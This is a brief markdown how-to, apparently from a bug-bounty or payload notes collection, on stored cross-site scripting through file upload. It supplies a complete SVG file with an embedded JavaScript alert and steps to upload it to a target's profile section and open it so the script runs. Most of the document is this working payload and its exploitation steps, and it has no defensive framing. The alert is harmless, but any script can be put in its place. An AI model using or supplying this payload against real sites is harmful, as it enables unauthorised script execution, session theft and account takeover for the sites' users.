

# File Upload XSS 


Create A File with .svg Extension 


Add Following Code 

```

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("XSS By Abhii Mali ");
   </script>
</svg>


```



Save File As  `filename.svg` 

Upload In Profile Section Of Target 

Open Image In New Tab 

XSS Will Execute 

